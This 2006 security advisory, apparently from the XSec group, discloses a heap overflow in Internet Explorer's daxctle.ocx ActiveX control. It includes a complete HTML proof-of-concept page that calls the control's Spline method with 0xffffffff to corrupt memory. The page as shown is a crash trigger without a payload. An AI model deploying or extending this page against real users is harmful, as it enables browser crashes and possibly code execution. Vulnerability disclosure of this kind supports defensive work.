Advisory ID:
XSec-06-10

Advisory Name:
Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

Release Date:
08/28/2006

Tested on:
Windows 2000/XP/2003 Internet Explorer 6.0 SP1

Affected version:
Windows 2000
Windows XP
Windows 2003

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer handle DirectAnimation.PathControl COM
object(daxctle.ocx) \
Spline method, Set the first parameter to 0xffffffff will triggers an
invalid memory \
write, That an attacker may DoS and possibly could execute arbitrary code.

Exploit:
=============== daxctle.htm start ================

<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx

--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>

var target = new ActiveXObject("DirectAnimation.PathControl");

target.Spline(0xffffffff, 1);

</script>
</body>
</html>

=============== daxctle.htm end ==================

Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19

About XSec:
We are redhat.